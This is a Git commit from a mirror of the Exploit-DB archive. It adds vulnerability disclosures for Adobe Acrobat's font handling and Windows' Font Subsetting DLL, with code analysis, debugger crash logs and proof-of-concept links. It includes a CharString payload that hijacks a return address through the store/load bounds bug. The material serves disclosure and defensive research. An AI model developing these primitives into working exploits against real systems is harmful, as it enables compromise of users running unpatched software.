bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-08-16

Browse source 
23 changes to exploits/shellcodes

NSKeyedUnarchiver - Info Leak in Decoding SGBigUTF8String
Adobe Acrobat CoolType (AFDKO) - Memory Corruption in the Handling of Type 1 Font load/store Operators
Adobe Acrobat CoolType (AFDKO) - Call from Uninitialized Memory due to Empty FDArray in Type 1 Fonts
Microsoft Font Subsetting - DLL Returning a Dangling Pointer via MergeFontPackage
Microsoft Font Subsetting - DLL Heap-Based Out-of-Bounds read in GetGlyphIdx
Microsoft Font Subsetting - DLL Double Free in MergeFormat12Cmap / MakeFormat12MergedGlyphList
Microsoft Font Subsetting - DLL Heap Corruption in FixSbitSubTables
Microsoft Font Subsetting - DLL Heap Corruption in ReadTableIntoStructure
Microsoft Font Subsetting - DLL Heap Corruption in ReadAllocFormat12CharGlyphMapList
Microsoft Font Subsetting - DLL Heap-Based Out-of-Bounds read in WriteTableFromStructure
Microsoft Font Subsetting - DLL Heap Corruption in MakeFormat12MergedGlyphList
Microsoft Font Subsetting - DLL Heap-Based Out-of-Bounds read in FixSbitSubTableFormat1
Adobe Acrobat Reader DC for Windows - Heap-Based Out-of-Bounds read due to Malformed JP2 Stream
Adobe Acrobat Reader DC for Windows - Use-After-Free due to Malformed JP2 Stream
Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow While Processing Malformed PDF
Adobe Acrobat Reader DC for Windows - Static Buffer Overflow due to Malformed Font Stream
Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed Font Stream
Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow in CoolType.dll
Adobe Acrobat Reader DC for Windows - Heap-Based Memory Corruption due to Malformed TTF Font
Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed JP2 Stream
Adobe Acrobat Reader DC for Windows - free() of Uninitialized Pointer due to Malformed JBIG2Globals Stream
Adobe Acrobat Reader DC for Windows - Double Free due to Malformed JP2 Stream

Microsoft Windows Text Services Framework MSCTF - Multiple Vulnerabilities
This commit is contained in:
Offensive Security 2019-08-16 05:02:25 +00:00
parent 7e6884af13
commit ab6387922c
24 changed files with 2389 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

19
exploits/multiple/dos/47257.txt Normal file
View file

@ -0,0 +1,19 @@
There is an info leak when decoding the SGBigUTF8String class using [SGBigUTF8String initWithCoder:]. This class initializes the string using [SGBigUTF8String initWithUTF8DataNullTerminated:] even though there is no guarantee the bytes provided to the decoder are null terminated. It should use [SGBigUTF8String initWithUTF8Data:] instead.
While this class is included in iMessage, it is more likely that this bug could be useful in local attacks.
To reproduce this issue:
1) Compile decodeleak.m
clang -o decodeleak -g decodeleak.m -fobjc-arc -framework CoreSuggestionsInternals -F/System/Library/PrivateFrameworks
2) Run:
./decodeleaks obj
leaked memory will be printed to the screen.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47257.zip

205
exploits/windows/dos/47259.txt Normal file
View file

@ -0,0 +1,205 @@
-----=====[ Background ]=====-----
AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree.
We have recently discovered that parts of AFDKO are compiled in in Adobe's desktop software such as Adobe Acrobat. Within a single installation of Acrobat, we have found traces of AFDKO in four different libraries: acrodistdll.dll, Acrobat.dll, CoolType.dll and AdobePDFL.dll. According to our brief analysis, AFDKO is not used for font rasterization (there is a different engine for that), but rather for the conversion between font formats. For example, it is possible to execute the AFDKO copy in CoolType.dll by opening a PDF file with an embedded font, and exporting it to a PostScript (.ps) or Encapsulated PostScript (.eps) document. It is uncertain if the AFDKO copies in other libraries are reachable as an attack surface and how.
It is also interesting to note that the AFDKO copies in the above DLLs are much older than the latest version of the code on GitHub. This can be easily recognized thanks to the fact that each component of the library (e.g. the Type 1 Reader - t1r, Type 1 Writer - t1w, CFF reader - cfr etc.) has its own version number included in the source code, and they change over time. For example, CoolType's version of the "cfr" module is 2.0.44, whereas the first open-sourced commit of AFDKO from September 2014 has version 2.0.46 (currently 2.1.0), so we can conclude that the CoolType fork is at least about ~5 years old. Furthermore, the forks in Acrobat.dll and AdobePDFL.dll are even older, with a "cfr" version of 2.0.31.
Despite the fact that CoolType contains an old fork of the library, it includes multiple non-public fixes for various vulnerabilities, particularly a number of important bounds checks in read*() functions declared in cffread/cffread.c (e.g. readFDSelect, readCharset etc.). These checks were first introduced in CoolType.dll shipped with Adobe Reader 9.1.2, which was released on 28 May 2009. This means that the internal fork of the code has had many bugs fixed for the last 10 years, which are still not addressed in the open-source branch of the code. Nevertheless, we found more security vulnerabilities which affect the AFDKO used by CoolType, through analysis of the publicly available code. This report describes one such issue reachable through the Adobe Acrobat file export functionality.
-----=====[ Description ]=====-----
The "Type 2 Charstring Format" specification from 5 May 1998 introduced two storage operators: store and load, which were both deprecated in the next iteration of the specs in 2000. These operators were responsible for copying data between the transient array (also known as the BuildCharArray, or BCA) and the so-called "Registry object".
As the document stated:
"""
The Registry provides more permanent storage for a number of items that have predefined meanings. The items stored in the Registry do not persist beyond the scope of rendering a font. Registry items are selected with an index, thus:
0 Weight Vector
1 Normalized Design Vector
2 User Design Vector
The result of selecting a Registry item with an index outside this list is undefined.
"""
The Type 1 CharString interpreter implemented in t1Decode() (c/public/lib/source/t1cstr/t1cstr.c) supports the load and store operators:
--- cut ---
1450 case t1_store:
1451 result = do_store(h);
1452 if (result)
1453 return result;
1454 continue;
[...]
1470 case t1_load:
1471 result = do_load(h);
1472 if (result)
1473 return result;
1474 continue;
--- cut ---
The do_store() and do_load() functions are as follows:
--- cut ---
664 /* Select registry item. Return NULL on invalid selector. */
665 static float *selRegItem(t1cCtx h, int reg, int *size) {
666 switch (reg) {
667 case T1_REG_WV:
668 *size = T1_MAX_MASTERS;
669 return h->aux->WV;
670 case T1_REG_NDV:
671 *size = T1_MAX_AXES;
672 return h->aux->NDV;
673 case T1_REG_UDV:
674 *size = T1_MAX_AXES;
675 return h->aux->UDV;
676 }
677 return NULL;
678 }
679
680 /* Execute "store" op. Return 0 on success else error code. */
681 static int do_store(t1cCtx h) {
682 int size;
683 int count;
684 int i;
685 int j;
686 int reg;
687 float *array;
688
689 CHKUFLOW(4);
690
691 count = (int)POP();
692 i = (int)POP();
693 j = (int)POP();
694 reg = (int)POP();
695 array = selRegItem(h, reg, &size);
696
697 if (array == NULL ||
698 i < 0 || i + count + 1 >= TX_BCA_LENGTH ||
699 j < 0 || j + count + 1 >= size)
700 return t1cErrStoreBounds;
701
702 memcpy(&array[j], &h->BCA[i], sizeof(float) * count);
703 return 0;
704 }
705
[...]
736
737 /* Execute "load" op. Return 0 on success else error code. */
738 static int do_load(t1cCtx h) {
739 int size;
740 int count;
741 int i;
742 int reg;
743 float *array;
744
745 CHKUFLOW(3);
746
747 count = (int)POP();
748 i = (int)POP();
749 reg = (int)POP();
750 array = selRegItem(h, reg, &size);
751
752 if (i < 0 || i + count - 1 >= TX_BCA_LENGTH || count > size)
753 return t1cErrLoadBounds;
754
755 memcpy(&h->BCA[i], array, sizeof(float) * count);
756
757 return 0;
758 }
--- cut ---
While both routines try to enforce proper bounds of the indexes and lengths (lines 697-700 and 752-753), they miss one important corner case -- negative count. When a value smaller than 0 is specified for "count", many of the other sanity checks can be bypassed, and out-of-bounds read/write access can be triggered with a high degree of control over what is copied where. The condition is especially dangerous in x86 builds, where a controlled 32-bit index added to a memory pointer can address the entire process address space. At the time of this writing, Adobe Acrobat for Windows is available as a 32-bit build only.
To give an example, setting count to a value in the range of 0x80000000-0xbfffffff makes it possible to set the "sizeof(float) * count" expression evaluate to an arbitrary multiple of 4 (0, 4, 8, ..., 0xfffffff8), enabling us to copy any chosen number of bytes in lines 702 and 755. At the same time, the value is so small that it bypasses all checks where "i + count" and "j + count" are involved for i, j in the range of 0-0x3fffffff, which also enables us to refer to the entire address space relative to the referenced buffer.
To summarize, we can copy an arbitrary number of bytes between h->BCA[] and the registry arrays at arbitrary offsets, which is a powerful primitive. There is only one obstacle -- the fact that values on the interpreter stack are stored as 32-bit floats, which means they have a 23-bit mantissa. For this reason, it is impossible to precisely control the integer values of i, j and count, if they are in the order of 2^30 or 2^31. The granularity is 128 for numbers around 2^30 and 256 for numbers around 2^31, so for example it is impossible to set i to 0x3fffffff or count to 0x80000001; the closest values are 0x3fffff80/0x40000000 and 0x80000000/0x80000100, respectively. In practice, this means that we can only copy out-of-bounds memory in chunks of 512 bytes (4 * 128) or 1024 under specific conditions, and that we can only choose negative offsets relative to BCA/array which are divisible by 128. On the other hand, if we set count to a largely negative value (e.g. -1073741696), we can set i and j to fully controlled (small) positive numbers.
The h->BCA[] array is stored within the t1cCtx structure in the stack frame of the t1cParse() function. The registry arrays reside within t1cAuxData structures allocated on the heap. As a result, the vulnerability gives us out-of-bounds access to both the stack and heap. An attacker could target generic data in memory related to the control flow such as return addresses, or application-specific data inside t1cCtx/t1cAuxData, which also contain many sensitive fields such as function pointers etc.
As a side note, the do_load() routine doesn't verify that array != NULL, which may result in a) operating on an uninitialized "size" variable in line 752, and b) passing NULL as the source parameter to memcpy() in line 755.
-----=====[ Invalid memcpy_s usage ]=====-----
We also wanted to point out another interesting bug in AFDKO, which is not present in the GitHub repository but can be found in CoolType. The latter build of the code uses safe variants of many standard functions, such as memcpy_s() instead of memcpy(), vsprintf_s() instead of vsprintf() etc. The memcpy() call in do_store() was also converted to memcpy_s(), and currently looks like this in decompiled form:
--- cut ---
memcpy_s(&array[j], 4 - 4 * j, (char *)h + 4 * i + 916, 4 * count);
--- cut ---
which can be translated to:
--- cut ---
memcpy_s(&array[j], sizeof(array) - sizeof(float) * j, &h->BCA[i], sizeof(float) * count);
--- cut ---
Note the second argument, which is supposed to be the length of the buffer being copied to. Judging by the code the author meant to set it to the number of available bytes from element "j" to the end of the array, but used the sizeof(array) expression instead of the actual length stored in the "size" variable. In this case sizeof(array) is the size of a pointer and evaluates to 4 or 8, which is nowhere near the actual size of the array (16 or 64 depending on the register). Consequently, this bug effectively blocks access to the element at array[1] for j={0, 1}, and is incorrectly set to a huge unsigned value for j >= 2, rendering it ineffective.
Considering that the 2nd "destsz" memcpy_s argument is not supposed to be a security boundary but just a safety net, and proper sanitization of the i, j, count values should prevent any kind of out-of-bounds access, we don't consider this a separate vulnerability. We are reporting it here as FYI.
-----=====[ Proof of Concept ]=====-----
The proof of concept is a PDF file with an embedded Type 1 font, which includes the following payload in the CharString of the "A" character:
--- cut ---
1 1621139584 134217728 div
2 dup 0 put
3 dup 1 put
4 dup 2 put
5 dup 3 put
6 dup 4 put
7 dup 5 put
8 dup 6 put
9 dup 7 put
10 dup 8 put
11 dup 9 put
12 dup 10 put
13 dup 11 put
14 0 2 0 12 store
15 0 67
16 4096 4096 -64 mul mul 128 add
17 load
18 endchar
--- cut ---
A brief description:
- Line 1 constructs a float on the stack with a binary representation of 0x41414141
- Lines 2-13 copy this value to the BuildCharArray at indexes 0-11
- Line 14 copies the 12 values from BCA to the registry #0 starting with index #2 (due to the memcpy_s bug)
- Lines 15-17 call the "load" operator with arguments reg=0, i=67, count=0xc0000080 (-1073741696). This results in copying 0x200 (0xc0000080 * 4) bytes from registry #0 to &h->BCA[67], which points to the return address of the t2cParse() function on the stack.
- Line 18 uses the "endchar" operator to return from the interpreter and use the overwritten return address, crashing at address 0x41414141.
-----=====[ Crash logs ]=====-----
When the poc.pdf file is opened with Adobe Acrobat Pro and converted to a PostScript document via "File > Export To > (Encapsulated) PostScript", the following crash occurs in Acrobat.exe:
--- cut ---
(2b10.3acc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=0d3993bc edx=00000200 esi=0daec260 edi=0d3992b8
eip=41414141 esp=0133a07c ebp=01000100 iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210297
41414141 ?? ???
0:000> dd esp
0133a07c 41414141 41414141 41414141 41414141
0133a08c 41414141 41414141 41414141 41414141
0133a09c 41414141 41414141 41414141 0dfd96a0
0133a0ac 0dfd96a0 00000004 ffffffff 00000000
0133a0bc 00000001 66751a2a 00000000 d4385860
0133a0cc 94000400 801f0014 21ec2020 10693aea
0133a0dc 0008dda2 9d30302b 8071001e 00000000
0133a0ec 00000000 acc70000 32027007 d2aa11d1
--- cut ---
-----=====[ References ]=====-----
[1] https://blog.typekit.com/2014/09/19/new-from-adobe-type-open-sourced-font-development-tools/
[2] https://github.com/adobe-type-tools/afdko
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47259.zip

214
exploits/windows/dos/47260.txt Normal file
View file

@ -0,0 +1,214 @@
-----=====[ Background ]=====-----
AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree.
We have recently discovered that parts of AFDKO are compiled in in Adobe's desktop software such as Adobe Acrobat. Within a single installation of Acrobat, we have found traces of AFDKO in four different libraries: acrodistdll.dll, Acrobat.dll, CoolType.dll and AdobePDFL.dll. According to our brief analysis, AFDKO is not used for font rasterization (there is a different engine for that), but rather for the conversion between font formats. For example, it is possible to execute the AFDKO copy in CoolType.dll by opening a PDF file with an embedded font, and exporting it to a PostScript (.ps) or Encapsulated PostScript (.eps) document. It is uncertain if the AFDKO copies in other libraries are reachable as an attack surface and how.
It is also interesting to note that the AFDKO copies in the above DLLs are much older than the latest version of the code on GitHub. This can be easily recognized thanks to the fact that each component of the library (e.g. the Type 1 Reader - t1r, Type 1 Writer - t1w, CFF reader - cfr etc.) has its own version number included in the source code, and they change over time. For example, CoolType's version of the "cfr" module is 2.0.44, whereas the first open-sourced commit of AFDKO from September 2014 has version 2.0.46 (currently 2.1.0), so we can conclude that the CoolType fork is at least about ~5 years old. Furthermore, the forks in Acrobat.dll and AdobePDFL.dll are even older, with a "cfr" version of 2.0.31.
Despite the fact that CoolType contains an old fork of the library, it includes multiple non-public fixes for various vulnerabilities, particularly a number of important bounds checks in read*() functions declared in cffread/cffread.c (e.g. readFDSelect, readCharset etc.). These checks were first introduced in CoolType.dll shipped with Adobe Reader 9.1.2, which was released on 28 May 2009. This means that the internal fork of the code has had many bugs fixed for the last 10 years, which are still not addressed in the open-source branch of the code. Nevertheless, we found more security vulnerabilities which affect the AFDKO used by CoolType, through analysis of the publicly available code. This report describes one such issue reachable through the Adobe Acrobat file export functionality.
-----=====[ Description ]=====-----
The Type 1 font parsing code in AFDKO resides in c/public/lib/source/t1read/t1read.c, and the main context structure is t1rCtx, also declared in that file. t1rCtx contains a dynamic array FDArray of FDInfo structures:
--- cut ---
70 typedef struct /* FDArray element */
71 {
72 abfFontDict *fdict; /* Font dict */
73 struct /* Subrs */
74 {
75 ctlRegion region; /* cstr data region */
76 dnaDCL(long, offset);
77 } subrs;
78 t1cAuxData aux; /* Auxiliary charstring data */
79 struct /* Dict key info */
80 {
81 long lenIV; /* Length random cipher bytes */
82 long SubrMapOffset; /* CID-specific key */
83 unsigned short SubrCount; /* CID-specific key */
84 unsigned short SDBytes; /* CID-specific key */
85 unsigned short BlueValues; /* Flags /BlueValues seen */
86 } key;
87 t1cDecryptFunc decrypt; /* Charstring decryption function */
88 } FDInfo;
89
[...]
110 dnaDCL(FDInfo, FDArray); /* FDArray */
--- cut ---
The array is initially set to 1 element at the beginning of t1rBegFont():
--- cut ---
3035 /* Parse PostScript font. */
3036 int t1rBegFont(t1rCtx h, long flags, long origin, abfTopDict **top, float *UDV) {
[...]
3045 dnaSET_CNT(h->FDArray, 1);
--- cut ---
Later on, the array can be resized to any number of elements in the range of 0-256 using the /FDArray operator, which is handled by the initFDArray() function:
--- cut ---
2041 /* Initialize FDArray. */
2042 static void initFDArray(t1rCtx h, long cnt) {
2043 int i;
2044 if (cnt < 0 || cnt > 256)
2045 badKeyValue(h, kFDArray);
2046 dnaSET_CNT(h->FDArray, cnt);
2047 dnaSET_CNT(h->fdicts, cnt);
2048 for (i = 0; i < h->FDArray.cnt; i++)
2049 initFDInfo(h, i);
2050 h->fd = &h->FDArray.array[0];
2051 }
2052
[...]
2318 case kFDArray:
2319 initFDArray(h, parseInt(h, kFDArray));
2320 break;
--- cut ---
Parts of the FDInfo structures (specifically the "aux" nested structure) are initialized later on, in prepClientData():
--- cut ---
2949 /* Prepare auxiliary data */
2950 for (i = 0; i < h->FDArray.cnt; i++) {
2951 FDInfo *fd = &h->FDArray.array[i];
2952 fd->aux.flags = 0;
2953 if (h->flags & T1R_UPDATE_OPS)
2954 fd->aux.flags |= T1C_UPDATE_OPS;
2955 fd->aux.src = h->stm.tmp;
2956 fd->aux.subrs.cnt = fd->subrs.offset.cnt;
2957 fd->aux.subrs.offset = fd->subrs.offset.array;
2958 fd->aux.subrsEnd = fd->subrs.region.end;
2959 fd->aux.stm = &h->cb.stm;
[...]
--- cut ---
The problem with the code is that it assumes that FDArray always contains at least 1 element, whereas initFDArray() allows us to truncate it to 0 items.
When the client program later calls t1rIterateGlyphs(), execution will reach the following code in readGlyph():
--- cut ---
3170 /* Read charstring. */
3171 static void readGlyph(t1rCtx h,
3172 unsigned short tag, abfGlyphCallbacks *glyph_cb) {
3173 int result;
3174 long offset;
3175 long flags = h->flags;
3176 Char *chr = &h->chars.index.array[tag];
3177 t1cAuxData *aux = &h->FDArray.array[chr->iFD].aux;
3178
[...]
--- cut ---
The chr->iFD values are initialized to 0 by default in abfInitGlyphInfo(), so in line 3177 the library will take a reference to the uninitialized structure under h->FDArray.array[0].aux:
--- cut ---
Breakpoint 1, readGlyph (h=0x61f000000080, tag=0, glyph_cb=0x62c0000078d8) at ../../../../../source/t1read/t1read.c:3179
3179 if ((flags & CID_FONT) && !(flags & PRINT_STREAM)) {
(gdb) print *aux
$1 = {flags = -4702111234474983746, src = 0xbebebebebebebebe, stm = 0xbebebebebebebebe, subrs = {cnt = -4702111234474983746, offset = 0xbebebebebebebebe},
subrsEnd = -4702111234474983746, ctx = 0xbebebebebebebebe, getStdEncGlyphOffset = 0xbebebebebebebebe, bchar = 190 '\276', achar = 190 '\276', matrix = {
-0.372548997, -0.372548997, -0.372548997, -0.372548997, -0.372548997, -0.372548997}, nMasters = -16706, UDV = {-0.372548997 <repeats 15 times>}, NDV = {
-0.372548997 <repeats 15 times>}, WV = {-0.372548997 <repeats 64 times>}}
--- cut ---
In the above listing, 0xbe are AddressSanitizer's marker bytes for unitialized heap memory (in a Linux x64 build of the "tx" tool used for testing). The "aux" pointer is further passed down to functions in t1cstr/t1cstr.c -- first to t1cParse(), then to t1DecodeSubr(), and then to srcSeek(), where the following call is performed:
--- cut ---
191 /* Seek to offset on source stream. */
192 static int srcSeek(t1cCtx h, long offset) {
193 if (h->aux->stm->seek(h->aux->stm, h->aux->src, offset))
194 return 1;
195 h->src.offset = offset;
196 return 0;
197 }
--- cut ---
As we remember, the contents of the "aux" object and specifically aux.stm are uninitialized, so the code attempts to load a function pointer from an undefined address. According to our tests, the memory allocator used in Adobe Acrobat boils down to a simple malloc() call without a subsequent memset(), so the undefined data could in fact be leftover bytes from an older allocation freed before the faulty font is loaded. As a result, the "stm" pointer could be controlled by the input file through some light heap spraying/grooming, such that the free memory chunks reused by malloc() contain the desired data. This, in turn, could potentially lead to arbitrary code execution in the context of the Acrobat process.
-----=====[ Proof of Concept ]=====-----
The proof of concept is a PDF file with an embedded Type 1 font, which includes an extra "/FDArray 0" operator to set the length of FDArray to 0, as described above.
-----=====[ Crash logs ]=====-----
For reliable reproduction, we have enabled the PageHeap for Acrobat.exe in Application Verifier. In addition to allocating memory on page boundaries, it also fills out newly returned memory with a 0xc0 value, resulting in more consistent crashes when using such uninitialized data.
When the poc.pdf file is opened with Adobe Acrobat Pro and converted to a PostScript document via "File > Export To > (Encapsulated) PostScript", the following crash occurs in Acrobat.exe:
--- cut ---
(2728.221c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=84ca7ef4 ebx=87edee2c ecx=c0c0c0c0 edx=00000000 esi=012f9a2c edi=00000021
eip=548d0e67 esp=012f99e0 ebp=012f99f4 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202
CoolType!CTGetVersion+0xafccf:
548d0e67 ff510c call dword ptr [ecx+0Ch] ds:002b:c0c0c0cc=????????
0:000> k
# ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
00 012f99f4 548d1091 CoolType!CTGetVersion+0xafccf
01 012f9a1c 548d1b6e CoolType!CTGetVersion+0xafef9
02 012f9ea0 548d545e CoolType!CTGetVersion+0xb09d6
03 012f9ed0 548d63b1 CoolType!CTGetVersion+0xb42c6
04 012f9eec 548a6164 CoolType!CTGetVersion+0xb5219
05 012f9f14 548a3919 CoolType!CTGetVersion+0x84fcc
06 012f9f34 5486bd5c CoolType!CTGetVersion+0x82781
07 012f9f70 54842786 CoolType!CTGetVersion+0x4abc4
08 012fa224 548ec8bd CoolType!CTGetVersion+0x215ee
09 012fb768 548ed5de CoolType!CTGetVersion+0xcb725
0a 012fc830 548243e6 CoolType!CTGetVersion+0xcc446
0b 012fc92c 54823fda CoolType!CTGetVersion+0x324e
0c 012fc940 54904037 CoolType!CTGetVersion+0x2e42
0d 012fc980 0c146986 CoolType!CTGetVersion+0xe2e9f
0e 012fc9f4 0c16008f AGM!AGMGetVersion+0x23eb86
0f 012fca40 0c16039c AGM!AGMGetVersion+0x25828f
10 012fca6c 0c1603fd AGM!AGMGetVersion+0x25859c
11 012fcaac 0c129704 AGM!AGMGetVersion+0x2585fd
12 012fcd48 62c11f7a AGM!AGMGetVersion+0x221904
13 012fcd88 62c1fde1 BIB!BIBInitialize4+0x7ff
14 012fcd90 62c11ee1 BIB!BIBLockSmithUnlockImpl+0x48c9
15 00000000 00000000 BIB!BIBInitialize4+0x766
--- cut ---
The value of ECX is loaded from EAX:
--- cut ---
0:000> u @$scopeip-7
CoolType!CTGetVersion+0xafcc8:
548d0e60 8b4808 mov ecx,dword ptr [eax+8]
548d0e63 ff7004 push dword ptr [eax+4]
548d0e66 51 push ecx
548d0e67 ff510c call dword ptr [ecx+0Ch]
548d0e6a 83c40c add esp,0Ch
548d0e6d 85c0 test eax,eax
548d0e6f 7405 je CoolType!CTGetVersion+0xafcde (548d0e76)
548d0e71 33c0 xor eax,eax
--- cut ---
And it is clear that almost none of the memory under [EAX] is initialized at the time of the crash:
--- cut ---
0:000> dd eax
84ca7ef4 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
84ca7f04 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c00000
84ca7f14 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
84ca7f24 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
84ca7f34 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
84ca7f44 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
84ca7f54 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
84ca7f64 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
--- cut ---
-----=====[ References ]=====-----
[1] https://blog.typekit.com/2014/09/19/new-from-adobe-type-open-sourced-font-development-tools/
[2] https://github.com/adobe-type-tools/afdko
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47260.zip

77
exploits/windows/dos/47261.txt Normal file
View file

@ -0,0 +1,77 @@
-----=====[ Background ]=====-----
The Microsoft Font Subsetting DLL (fontsub.dll) is a default Windows helper library for subsetting TTF fonts; i.e. converting fonts to their more compact versions based on the specific glyphs used in the document where the fonts are embedded. It is used by Windows GDI and Direct2D, and parts of the same code are also found in the t2embed.dll library designed to load and process embedded fonts.
The DLL exposes two API functions: CreateFontPackage and MergeFontPackage. We have developed a testing harness which invokes a pseudo-random sequence of such calls with a chosen font file passed as input. This report describes a crash triggered by a malformed font file in the fontsub.dll code through our harness.
-----=====[ Description ]=====-----
The declaration of the public MergeFontPackage() function is as follows:
--- cut ---
unsigned long MergeFontPackage(
const unsigned char *puchMergeFontBuffer,
const unsigned long ulMergeFontBufferSize,
const unsigned char *puchFontPackageBuffer,
const unsigned long ulFontPackageBufferSize,
unsigned char **ppuchDestBuffer,
unsigned long *pulDestBufferSize,
unsigned long *pulBytesWritten,
const unsigned short usMode,
CFP_ALLOCPROC lpfnAllocate,
CFP_REALLOCPROC lpfnReAllocate,
CFP_FREEPROC lpfnFree,
void *lpvReserved
);
--- cut ---
The fifth, sixth and seventh parameters (ppuchDestBuffer, pulDestBufferSize and pulBytesWritten) are used to return a pointer to an output buffer, its size and the length of the actual content written by the API, if the routine succeeds. However, during our fuzzing, we have encountered a number of crashes caused by the function returning a pointer to a freed memory region through ppuchDestBuffer, and an invalid value in pulDestBufferSize.
Thanks to the fact that the function uses a client-provided allocator, we can observe the heap allocations being made during the library runtime. If we compile the testing harness in Debug mode and run it against one of the input samples (preferably with PageHeap enabled), we should see output similar to the following:
--- cut ---
[...]
[+] realloc(0000000000000000, 0x48b8) ---> 000001A1F1942740
[+] realloc(000001A1F1942740, 0x4ffd) ---> 000001A1F1948FF0
[+] realloc(000001A1F1948FF0, 0x57fc) ---> 000001A1F194F800
[+] realloc(000001A1F194F800, 0x60c8) ---> 000001A1F1956F30
[+] realloc(000001A1F1956F30, 0x6a75) ---> 000001A1F195E580
[+] realloc(000001A1F195E580, 0x751a) ---> 000001A1F1966AE0
[+] realloc(000001A1F1966AE0, 0x80cf) ---> 000001A1F196FF20
[+] realloc(000001A1F196FF20, 0x8db0) ---> 000001A1F1979240
[+] realloc(000001A1F1979240, 0x9bdb) ---> 000001A1F1983420
[+] realloc(000001A1F1983420, 0xab70) ---> 000001A1F198E480
[+] realloc(000001A1F198E480, 0xbc94) ---> 000001A1F199A360
[+] MergeFontPackage returned buffer 000001A1F1942740, buffer size 0x48b8, bytes written 0xae5c
--- cut ---
... followed by a crash while trying to access the 0x1A1F1942740 address:
--- cut ---
(2664.3028): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
VCRUNTIME140D!memcpy_repmovs+0xe:
00007fff`a00b16ee f3a4 rep movs byte ptr [rdi],byte ptr [rsi]
0:000> ? rsi
Evaluate expression: 1795054380864 = 000001a1`f1942740
0:000> dd rsi
000001a1`f1942740 ???????? ???????? ???????? ????????
000001a1`f1942750 ???????? ???????? ???????? ????????
000001a1`f1942760 ???????? ???????? ???????? ????????
000001a1`f1942770 ???????? ???????? ???????? ????????
000001a1`f1942780 ???????? ???????? ???????? ????????
000001a1`f1942790 ???????? ???????? ???????? ????????
000001a1`f19427a0 ???????? ???????? ???????? ????????
000001a1`f19427b0 ???????? ???????? ???????? ????????
--- cut ---
In the output log, we can see that a buffer of size 0x48b8 was initially allocated at address 0x1A1F1942740, but was then reallocated multiple times to incrementally grow it up to 0xbc94 bytes. However, the output values of ppuchDestBuffer and pulDestBufferSize are not updated accordingly, and so they contain the stale data written after the first allocation. Interestingly, the problem doesn't seem to affect the third output argument -- pulBytesWritten, which is correctly updated to the most recent value, and is thus bigger then *pulDestBufferSize, which should normally never happen.
Returning such a stale pointer may lead to a use-after-free condition, and/or a double free when the client software decides to free the buffer on its own. This in turn may potentially lead to arbitrary code execution in the context of the fontsub.dll client process.
The issue reproduces on a fully updated Windows 10 1709; we haven't tested earlier versions of the system. Attached are 3 proof of concept malformed font files which trigger the crash.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47261.zip

69
exploits/windows/dos/47262.txt Normal file
View file

@ -0,0 +1,69 @@
-----=====[ Background ]=====-----
The Microsoft Font Subsetting DLL (fontsub.dll) is a default Windows helper library for subsetting TTF fonts; i.e. converting fonts to their more compact versions based on the specific glyphs used in the document where the fonts are embedded. It is used by Windows GDI and Direct2D, and parts of the same code are also found in the t2embed.dll library designed to load and process embedded fonts.
The DLL exposes two API functions: CreateFontPackage and MergeFontPackage. We have developed a testing harness which invokes a pseudo-random sequence of such calls with a chosen font file passed as input. This report describes a crash triggered by a malformed font file in the fontsub.dll code through our harness.
-----=====[ Description ]=====-----
We have encountered the following crash in fontsub!GetGlyphIdx:
--- cut ---
(4a54.4cd8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
FONTSUB!GetGlyphIdx+0x9e:
00007fff`9f4bbf96 0fb70447 movzx eax,word ptr [rdi+rax*2] ds:00000155`3b64af80=????
0:000> ? rdi
Evaluate expression: 1465580302336 = 00000155`3b64b000
0:000> ? rax
Evaluate expression: -64 = ffffffff`ffffffc0
0:000> dd rdi
00000155`3b64b000 006a0010 006c006b 0111006d 00f80085
00000155`3b64b010 011100fd 02af02ae 028b02b0 028d028c
00000155`3b64b020 02e00071 01060000 01000000 00000000
00000155`3b64b030 01020000 00020000 00000000 00000000
00000155`3b64b040 00000000 00010000 03040000 07080506
00000155`3b64b050 0b0c090a 0f100d0e 13141112 17181516
